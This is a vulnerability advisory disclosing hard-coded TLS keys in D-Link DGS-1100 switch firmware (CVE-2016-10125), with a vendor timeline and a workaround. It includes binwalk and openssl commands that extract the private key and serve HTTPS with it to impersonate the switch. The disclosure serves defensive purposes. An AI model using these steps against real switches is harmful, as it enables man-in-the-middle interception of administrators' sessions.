CVE-2016-10125 - DLink DGS-1100 switch static hard-coded TLS crypto keys in firmware

1. Vulnerability Properties

Title: DLink DGS-1100 switch static hard-coded TLS cryptographic keys in firmware
CVE ID: CVE-2016-10125
CVSSv3 Base Score: 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Vendor: DLink (http://www.dlink.com)
Products: DGS-1100 Series Gigabit Smart Managed Switches, RevB (possibly others)
Advisory Release Date: 24 Aug 2016
Advisory URL: https://labs.integrity.pt/advisories/dlink-dgs-1100-hardcoded-keys
Credits: Discovery by Bruno Morisson <bm[at]integrity.pt>

2. Vulnerability Summary

The DGS-1100 16 and 24 port switches (RevB) series firmware contains static, hardcoded cryptographic keys in the firmware. These keys, with the X.509 certificate, are used when HTTPS management is enabled on the switch.

An attacker can recover the private key from the public firmware, and use it perform a Man-In-The-Middle attack on the switch administrator, when he tries to manage the switch through HTTPS.

Since these keys are hardcoded, they cannot be changed.

3. Technical Details

Exploiting the vulnerability

To exploit this vulnerability, the attacker only needs to download the firmware, and extract the private key and the certificate:

$ binwalk DGS1100-fw_1.01.018.flash 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
969166        0xEC9CE         Unix path: /../src/kernel/background.c
1238916       0x12E784        Certificate in DER format (x509 v3), header length: 4, sequence length: 685
1239608       0x12EA38        Private key in DER format (PKCS header length: 4, sequence length: 605

After extraction, check certificate:

$ openssl x509 -inform der -in 12E784.crt -noout -text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 123 (0x7b)
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: CN=Sample Matrix RSA-1024 Certificate Authority, C=US, ST=WA, L=Seattle, O=INSIDE Secure Corporation, OU=Test
        Validity
            Not Before: Jan  8 22:58:33 2013 GMT
            Not After : Jan  8 22:58:33 2016 GMT
        Subject: CN=Sample Matrix RSA-1024 Certificate, C=US, ST=WA, L=Seattle, O=INSIDE Secure Corporation, OU=Test
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                    00:b6:53:c6:8e:1c:30:24:26:7d:c5:0c:96:9a:95:
                    95:7c:2e:4d:d3:0a:e2:1e:92:82:aa:07:30:ce:71:
                    c4:2b:d1:45:be:e0:f6:02:98:b1:ad:62:3b:6b:ac:
                    84:57:9d:c5:e8:b7:3f:c4:bc:b5:2f:48:2a:c8:c8:
                    84:15:2b:fb:62:30:bc:db:ba:0f:a9:2c:3d:d7:70:
                    bf:a0:af:86:5e:c6:c4:75:27:e3:7a:e2:7f:d4:da:
                    90:b6:a7:6c:a5:6e:e3:af:49:1b:4c:e4:5b:23:de:
                    fa:5d:8b:fc:d8:65:73:ce:ef:86:34:f4:fb:28:3a:
                    06:e1:ca:74:0c:02:dc:45:87
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: critical
                CA:FALSE
    Signature Algorithm: sha1WithRSAEncryption
        70:47:b9:b1:40:4a:3c:03:62:ae:1e:a6:44:74:f9:ea:6e:fd:
        da:7d:ef:36:42:49:90:13:f9:6f:cb:6f:dc:d7:9c:fa:56:90:
        89:9f:3b:87:d8:07:cb:3a:22:19:f6:6c:08:58:77:42:58:50:
        ac:f5:f9:ff:1c:df:ab:7c:a1:49:0b:18:5d:b9:47:a0:47:03:
        71:9a:9b:dd:d3:cc:8a:bc:b7:77:3c:f1:a9:ff:5f:56:92:4a:
        2d:84:9b:21:9e:44:30:5d:39:b9:38:a7:e1:b5:19:51:68:1f:
        a8:94:c2:22:d7:94:18:c1:55:78:ca:76:c2:da:7a:49:05:fd:
        51:0c

Confirm this is the exact same certificate shown by the browser.

Check the extracted key:

$  openssl rsa -noout -modulus -in 12EA38.key -inform der

Modulus=B653C68E1C3024.....

 

Run a webserver with this certificate and key:

$ openssl s_server -cert 12E784.crt -certform der -key 12EA38.key  -keyform der -accept 443 -HTTP -tls1

An attacker would now be able to perform a man in the middle attack with a correct certificate, even if the administrator had saved this certificate as "trusted".

4. Vulnerable Versions

  • Firmware 1.01.018 for Rev.B of the DGS-1100, possibly others.

5. Solution

No solution available. See “6. Workarounds”.

6. Workarounds

Ensure all accesses to the management interface of the switch are performed through a dedicated cable only.

7. Vulnerability Timeline

  • 29 March 2016 – Reported vulnerability to vendor
  • 31 March 2016 – Provided additional information to vendor;
  • 27 May 2016 – Emailed vendor requesting feedback;
  • 6 June 2016 – Vendor replied;
  • 15 June 2016 – Emailed vendor saying available firmware is still the same vulnerable one;
  • 29 June 2016 - Vendor sent pre-release version. We replied that we no longer have access to a device to assess if vulnerability is corrected;
  • 27 June 2016 – Feedback requested on possible update;
  • 24 Aug 2016 - No feedback received. Version available still vulnerable. Advisory released.